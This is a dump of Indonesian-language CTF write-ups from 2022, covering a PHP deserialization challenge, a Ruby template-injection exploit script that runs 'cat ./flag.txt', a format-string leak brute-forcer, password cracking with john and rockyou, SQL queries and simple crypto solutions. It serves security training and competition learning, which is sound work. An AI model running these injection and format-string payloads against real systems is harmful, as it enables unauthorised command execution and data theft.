40 | public function getFlag()
41 | {
42 | return $this->flag;
43 | }
44 | public function setFlagFile($flagfile)
45 | {
46 | if (stristr($flagfile, "flag") || !file_exists($flagfile)) {
47 | echo "ERROR:Fileisnotvalid!";
48 | return;
49 | }
50 | $this->flagfile = $flagfile;
51 | }
52 | public function getFlagFile()
53 | {
54 | return $this->flagfile;
55 | }
56 | public function readFlag()
57 | {
58 | if (!isset($this->flag) && file_exists($this->flagfile)) {
59 | $this->flag = join("", file($this->flagfile));
60 | }
61 | }
62 | public function showFlag()
63 | {
64 | if ($this->isAllowedToSeeFlag) {
65 | echo "Theflagis:" . $this->flag;
66 | } else {
67 | echo "Theflagis:[You'renotallowedtoseeit!]";
68 | }
69 | }
70 | }
71 | function secure_jsonify($obj)
72 | {
73 | $data = array();
74 | $data['class'] = get_class($obj);
75 | $data['properties'] = array();
76 | foreach ($obj->__shutdown() as &$key) {
77 | $data['properties'][$key] = serialize($obj->$key);
78 | }
79 | return json_encode($data);
80 | }
81 | function secure_unjsonify($json, $allowed_classes)
82 | {
83 | $data = json_decode($json, true);
84 | if (!in_array($data['class'], $allowed_classes)) {
85 | throw new Exception("ErrorProcessingRequest", 1);
86 | }
87 | $obj = new $data['class']();
88 | foreach ($data['properties'] as $key => $value) {
89 | $obj->$key = unserialize($value, ['allowed_classes' => false]);
90 | }
91 | $obj->__startup();
92 | return $obj;
93 | }
94 | if (isset($_GET['show']) && isset($_GET['obj']) && isset($_GET['flagfile'])) {
95 | $f = secure_unjsonify($_GET['obj'], array('Flag'));
96 | $f->setFlagFile($_GET['flagfile']);
97 | $f->readFlag();
98 | $f->showFlag();
99 | } elseif (isset($_GET['show'])) {
100 | $f = new Flag();
101 | $f->flagfile = "./flag.php";
102 | $f->readFlag();
103 | $f->showFlag();
104 | } else {
105 | header("Content-Type:text/plain");
106 | echo preg_replace('/\s+/', '', str_replace("\n", '', file_get_contents("./index.php")));
107 | }//With<3by@gehaxelt
108 |
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/jsonify/test.php:
--------------------------------------------------------------------------------
1 | flagfile = $flagfile;
22 | }
23 | }
24 | public function __shutdown()
25 | {
26 | return $this->properties;
27 | }
28 | public function __startup()
29 | {
30 | $this->readFlag();
31 | }
32 | public function __toString()
33 | {
34 | return "ClassFlag(" . $this->flag . ")";
35 | }
36 | public function setFlag($flag)
37 | {
38 | $this->flag = $flag;
39 | }
40 | public function getFlag()
41 | {
42 | return $this->flag;
43 | }
44 | public function setFlagFile($flagfile)
45 | {
46 | if (stristr($flagfile, "flag") || !file_exists($flagfile)) {
47 | echo "ERROR:Fileisnotvalid!";
48 | return;
49 | }
50 | $this->flagfile = $flagfile;
51 | }
52 | public function getFlagFile()
53 | {
54 | return $this->flagfile;
55 | }
56 | public function readFlag()
57 | {
58 | if (!isset($this->flag) && file_exists($this->flagfile)) {
59 | $this->flag = join("", file($this->flagfile));
60 | }
61 | }
62 | public function showFlag()
63 | {
64 | echo $this->isAllowedToSeeFlag;
65 | if ($this->isAllowedToSeeFlag) {
66 | echo "Theflagis:" . $this->flag;
67 | } else {
68 | echo "Theflagis:[You'renotallowedtoseeit!]";
69 | }
70 | }
71 | }
72 | function secure_jsonify($obj)
73 | {
74 | $data = array();
75 | $data['class'] = get_class($obj);
76 | $data['properties'] = array();
77 | foreach ($obj->__shutdown() as &$key) {
78 | $data['properties'][$key] = serialize($obj->$key);
79 | }
80 | return json_encode($data);
81 | }
82 | function secure_unjsonify($json, $allowed_classes)
83 | {
84 | $data = json_decode($json, true);
85 | if (!in_array($data['class'], $allowed_classes)) {
86 | throw new Exception("ErrorProcessingRequest", 1);
87 | }
88 | $obj = new $data['class']();
89 | foreach ($data['properties'] as $key => $value) {
90 | $obj->$key = unserialize($value, ['allowed_classes' => false]);
91 | }
92 | $obj->__startup();
93 | return $obj;
94 | }
95 |
96 | # make $this->isAllowedToSeeFlag to true, use unserialize vulnerability to get the flag, set flag value to setFlagFile('index.php');
104 | $f->readFlag();
105 | $f->showFlag();
106 | // http://52.59.124.14:10002/?show=&obj={%22class%22:%22Flag%22,%22properties%22:{%22isAllowedToSeeFlag%22:%22b:1;%22,%22flagfile%22:%22s:8:\%22flag.php\%22;%22}}&flagfile=index.php
107 | ?>
108 |
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/jsonify/test2.php:
--------------------------------------------------------------------------------
1 |
11 | ```
12 |
13 |
14 | Setelah kita bypass kita mencoba salah satu common vulnerability yang biasanya terdapat dalam library WEB untuk bahasa pemrograman OOP yaitu SSTI
15 |
16 | untuk payload saya mengambil dari website ini :https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md
17 |
18 | ```python
19 | import requests
20 | import urllib.parse as up
21 |
22 | URL = "http://01.linux.challenges.ctf.thefewchosen.com:57588"
23 | class Exploit:
24 | def __init__(self, param, url=URL):
25 | self.session = requests.Session()
26 | # self.session.proxies = {'http': 'http://localhost:8080'}
27 | self.param = param
28 | self.url = url
29 |
30 | def payloadAndBypass(self, malcode):
31 | '''bypass regex expression with newline (e.g. \\n)'''
32 | bypass = "asd\n"
33 | payload = bypass+malcode
34 | return {"input":payload}
35 |
36 | def start(self):
37 | r = self.session.post(self.url, data=self.payloadAndBypass(self.param))
38 | return r.text
39 |
40 |
41 | param = """<%= IO.popen('cat ./flag.txt').readlines() %>"""
42 |
43 | n = Exploit(param=param).start()
44 | print(n)
45 | ```
46 | ### referensi
47 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md
48 |
49 |
50 | ## ADDING IN PARTS
51 | cat = forensics setelah di analisa, ternyata CRC nya tidak valid, kemungkinan data di dalamnya berubah, untungnya yang berubah cuman 1 bytes jadi aku buat script untuk bruteforce isi dari bytes yang berubah
52 |
53 | ```python
54 | from zipfile import BadZipFile, ZipFile
55 |
56 | strings = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_}{"
57 | a = 31
58 | flag = ""
59 | for i in range(0,22):
60 | f = open(f"{i}.zip", "rb").read()
61 | j = 0
62 | open("temp.zip", "wb").write(f)
63 | if i == 10:
64 | a = 32
65 | flag += "c"
66 | continue
67 | while len(flag) != i+1:
68 | try:
69 | zi = ZipFile("temp.zip", "r")
70 | flag += zi.read(f"{i}").decode()
71 | print("process", end="\r")
72 | except BadZipFile:
73 | f = f[:a] + strings[j].encode() + f[a+1:]
74 | open("temp.zip", "wb").write(f)
75 | j += 1
76 |
77 | print(flag)
78 | ```
79 | ================
80 | TFCCTF{ch3cksum2_g0od}
81 |
82 | ## GETENV
83 |
84 | Vulnerabiliy kali ini adalah format string vulnerability, dimana kita dapat me-leak flag yang terdapat di env-variable dengan cara bruteforce.
85 |
86 | Disini saya menggunakan parameter contoh `%1$s` , untuk meleak flag, itu kita lakukan berkali-kali sampai flagnya terlihat
87 |
88 | Referensi:[https://infosecwriteups.com/exploiting-format-string-vulnerability-97e3d588da1b](https://infosecwriteups.com/exploiting-format-string-vulnerability-97e3d588da1b "https://infosecwriteups.com/exploiting-format-string-vulnerability-97e3d588da1b")
89 |
90 | ```python
91 | import pwn
92 | import threading
93 |
94 | # remove debug output
95 | pwn.context.log_level = 'WARNING'
96 |
97 | def brute_format_str(num, file):
98 | with pwn.remote('01.linux.challenges.ctf.thefewchosen.com', 58846) as r:
99 | try:
100 | payload = f"%{num}$s"
101 | p = r.recv(1000)
102 | p = r.sendline(payload)
103 | p = r.recv(1000)
104 | except:
105 | pass
106 | try:
107 | file.write(p)
108 | except:
109 | pass
110 |
111 |
112 | with open("dump.txt", "ab") as f:
113 | for i in range(0,100):
114 | t = threading.Thread(target=brute_format_str, args=(i,f))
115 | t.start()
116 | if i % 10 == 0:
117 | t.join()
118 | ```
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016084856.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016084856.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016084906.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016084906.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016084928.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016084928.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016085136.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085136.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016085148.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085148.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016085202.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085202.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016085210.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085210.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016085502.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085502.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016085646.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016085646.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016090134.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090134.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016090147.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090147.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016090154.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090154.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016090238.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090238.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016090243.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090243.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/Pasted image 20221016090323.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/deadface-ctf/Pasted image 20221016090323.png
--------------------------------------------------------------------------------
/2022/deadface-ctf/README.md:
--------------------------------------------------------------------------------
1 | # OSINT
2 | ## Under Public Scrutiny
3 | Cukup dari keyword github di https://ghosttown.deadface.io/
4 | 
5 |
6 | ketemu thread ini: [https://ghosttown.deadface.io/t/made-a-github-link-for-projects/66](https://ghosttown.deadface.io/t/made-a-github-link-for-projects/66 "https://ghosttown.deadface.io/t/made-a-github-link-for-projects/66") (edited)
7 |
8 | katanya akun githubnya deadf4c3
9 | ada 1 repo sus, got flag https://github.com/deadf4c3/tarrasque
10 |
11 | ## Grave Digger 1
12 |
13 | Untuk challenge ini kita perlu ssh ke user crypto\_vamp lalu ketik env
14 |
15 | ```
16 | crypto_vamp@1d2d67359e3a:/proc$ env
17 | GRAVEDIGGER1=flag{d34dF4C3_en1roN_v4r}
18 | HOSTNAME=1d2d67359e3a
19 | PWD=/proc
20 | HOME=/home/crypto_vamp
21 | TERM=xterm
22 | TMOUT=1600
23 | SHLVL=1
24 | PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
25 | _=/usr/bin/env
26 | OLDPWD=/
27 | ```
28 |
29 | # REV
30 | ## Monstrosity
31 | Diberikan file binary, disini yang unik adalah program tersebut sectionnya di encrypt dan akan didecrypt runtime. Cukup dump menggunakan gdb dan dapet binary yg bisa dianalisis
32 |
33 | 
34 |
35 | program akan meminta input dan melakukan cek dengan input tersebut:
36 |
37 | 
38 |
39 | bisa dilihat, input user akan dicompare dengan var v13
40 | dimana disini var v13 diencrypt dengan xor 0x1e:
41 |
42 | 
43 |
44 | setelah decrypt dengan saibersep, dapet jawabannya and got flag
45 |
46 | 
47 |
48 | ## Cereal Killer 02 (REV)
49 | Diberi program .NET yang dimana disini flag diencrypt dengan aes menggunakan jawaban. validasi jawab disini menggunakan md5, dimana md5nya adalah aee1ee5262757cf67b619ff63e9672b6, setelah menggunakan crackstation untuk mencari jawabannya, dapet hasil peanutbuttercrunch. Enter the flag and boom got flag
50 | 
51 |
52 | 
53 |
54 |
55 | # PWN
56 | ## Easy Creds
57 | untuk soal ini kita hanya perlu menggunakan john
58 |
59 | ```bash
60 | john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt
61 | ```
62 |
63 | untuk identifiernya saya menggunakan https://hashes.com/en/tools/hash_identifier
64 |
65 | ## Crack Database
66 | diberikan sebuah file keepas, kita akan crack dengan john, masalahnya wordlist yg dipake gatawu,
67 |
68 | kita coba cari di ghostown https://ghosttown.deadface.io
69 | ternyata pada post More Bitcoin`$$$$$` user bernama mirveal memberikan wordlists, kita coba gunakan itu untuk membuka crack passwordnya..
70 | didapatlah passwordnya complexpassword
71 |
72 | buka di keepass copy password pada title PWN07-....
73 | flag{breaking_the_law}
74 |
75 | 
76 |
77 | 
78 |
79 | 
80 |
81 | ## Grave Digger 2
82 |
83 | kita perlu masuk menggunakan ssh dari grave digger 1
84 |
85 | ```
86 | ssh crypto_vamp@env.deadface.io
87 | # password: 123456789q
88 | ```
89 |
90 | read file gravedigger2 menggunakan
91 |
92 | ```
93 | /opt/reader -f gravedigger2
94 | ```
95 |
96 | maka nanti akan muncul qr code, setelah itu kita scan qrcodenya dan nanti akan mendapatkan flagnya.
97 |
98 | # crypto
99 | ## Two Dead Boys
100 |
101 | diberikan string yang di encrypt vigenere
102 |
103 | "qlsn{Pvelnnad Aumjcnyg: Ibrwpaty ENLECPZNYG!}"
104 |
105 | karena kita sudah tahu 4 huruf pertama maka kita dapat memanfaatkan fitur known plaintext di dcode.fr tinggal pake mode bruteforce saja maka flag muncul
106 |
107 | flag{Critical Thinking: Question EVERYTHING!}
108 |
109 | ## "D" is for Dumb Mistakes
110 |
111 | p = 1049
112 | q = 2063
113 | e = 777887
114 |
115 | untuk dapat d atau privatekey kita bisa menggunakan fungsi inversemod pada gympy2 atau make dcode.fr
116 |
117 | N = (p-1)*(q-1)
118 | d = (e,N)
119 | d = 1457215
120 |
121 | flag{d=1457215}
122 |
123 | ## "D" if for Decryption
124 |
125 | masih berhubungan dengan soal pertaam tapi kali ini kita diberikan cipher text untuk di decrypt yang mana hasilnya anggka yang direpresentasikan urutan alphabet
126 |
127 | untuk scriptnya
128 | ```python
129 | from Crypto.Util.number import inverse, long_to_bytes
130 |
131 | p = 1049
132 | q = 2063
133 | e = 777887
134 | d = 1457215
135 | n = p*q
136 |
137 | data = [992478,1726930,1622358,1635603,1385290]
138 |
139 | flag = []
140 | for i in data:
141 | flag +=long_to_bytes(pow(i,d,n))
142 |
143 | print('flag{',end="")
144 | for i in flag: print(chr(64+i).lower(),end="")
145 | print('}')
146 | ```
147 |
148 |
149 | # stegano
150 | ## The Goodest Boy
151 | diberikan gambar ANJING! wkwkw dalam jika dilihat string ada ascci bertuliskan password:borkbork
152 |
153 | coba extract pake tool steghide ternyta ada pdf yang berisi flag
154 | flag{whos_A_g00d_boi_bork_bork}
155 |
156 | # SQL
157 | ## Counting heads
158 | diberikan file .sql, import sqlnya, terus masuk ke database nya, masukin query flag{2400}
159 |
160 | 
161 |
162 | ## The Faculty
163 | lanjutan sql sebelumnya, masukin query
164 |
165 | select count(r.user_id) from roles_assigned r join users u on r.user_id=u.user_id where not role_id=1;
166 |
167 | flag{627}
168 |
169 | 
170 |
171 | ## Let's Hash It Out
172 | diberi clue DEADFACE menargetkan sebuah user, lihat password user tersebut.
173 |
174 | langsung cari di https://ghosttown.deadface.io/ ketemu post Database Question lanjut cari siapa user yang dimaksud, ternyata role Administration, selanjutnya kita query role Administration pada bagian passwordnya
175 |
176 | flag{b487af41779cffb9572b982e1a0bf83f0eafbe05}
177 |
178 | 
179 |
180 | 
181 |
182 | ## Fall Classes
183 | diberikan pertanyaan berapa banyak kelas musim semi yang unik.
184 | langsung bikin query select count(distinct tc.course_id) from terms t join term_courses tc on t.term_id=tc.term_id where t.term_id=2;
185 | flag{405}
186 |
187 | 
188 |
189 | # Bonus
190 |
191 | ## Contact
192 |
193 | Dalam ssh di user crypto\_vamp kita inputkan man reader untuk melihat manual dari program yang dibuat lilith
194 |
195 | ```
196 | crypto_vamp@3e71a870077f:/home/spookyboi$ man reader
197 | man(8) reader man page man(8)
198 |
199 | NAME
200 | reader - read files as lilith
201 |
202 | SYNOPSIS
203 | reader [OPTIONS] [FILENAME]
204 |
205 | DESCRIPTION
206 | reader is developed to help crypto_vamp and other new recruits read privileged files until their vetting process is complete.
207 |
208 | OPTIONS
209 | -f, --file FILENAME
210 | Read the contents of FILENAME.
211 |
212 | -c, --command COMMAND
213 | Execute a command (for troubleshooting purposes ONLY).
214 |
215 | -h, --help
216 | View the help information.
217 |
218 | -v, --version
219 | View the version information.
220 |
221 | BUGS No known bugs.
222 |
223 | AUTHOR
224 | Lilith (bl0ody_mary@deadface.io)
225 |
226 | 1.3.1
227 | ```
228 |
229 | maka disitu akan ada emailnya si lilith
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010110356.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110356.png
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010110402.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110402.png
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010110408.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110408.png
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010110505.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110505.png
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010110510.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110510.png
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010110604.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110604.png
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010110608.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110608.png
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010110728.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110728.png
--------------------------------------------------------------------------------
/2022/gdg-algiers-ctf/Pasted image 20221010111105.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010111105.png
--------------------------------------------------------------------------------
/2022/glacierctf-2022/Pasted image 20221127092045.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092045.png
--------------------------------------------------------------------------------
/2022/glacierctf-2022/Pasted image 20221127092101.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092101.png
--------------------------------------------------------------------------------
/2022/glacierctf-2022/Pasted image 20221127092221.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092221.png
--------------------------------------------------------------------------------
/2022/glacierctf-2022/Pasted image 20221127092240.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092240.png
--------------------------------------------------------------------------------
/2022/glacierctf-2022/Pasted image 20221127092353.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092353.png
--------------------------------------------------------------------------------
/2022/glacierctf-2022/Pasted image 20221127093038.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127093038.png
--------------------------------------------------------------------------------
/2022/glacierctf-2022/Pasted image 20221127093304.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127093304.png
--------------------------------------------------------------------------------
/2022/glacierctf-2022/Pasted image 20221127093345.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127093345.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023144928.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023144928.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023145014.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023145014.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023145032.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023145032.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023145105.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023145105.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023153937.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023153937.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154016.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154016.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154059.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154059.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154120.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154120.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154451.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154451.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154508.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154508.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154544.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154544.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154728.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154728.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154928.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154928.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023154942.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154942.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023155120.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023155120.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023155211.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023155211.png
--------------------------------------------------------------------------------
/2022/jade-ctf/Pasted image 20221023155218.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023155218.png
--------------------------------------------------------------------------------
/2022/kitctfctf-2022/Pasted image 20221211192759.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192759.png
--------------------------------------------------------------------------------
/2022/kitctfctf-2022/Pasted image 20221211192912.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192912.png
--------------------------------------------------------------------------------
/2022/kitctfctf-2022/Pasted image 20221211192926.png:
--------------------------------------------------------------------------------
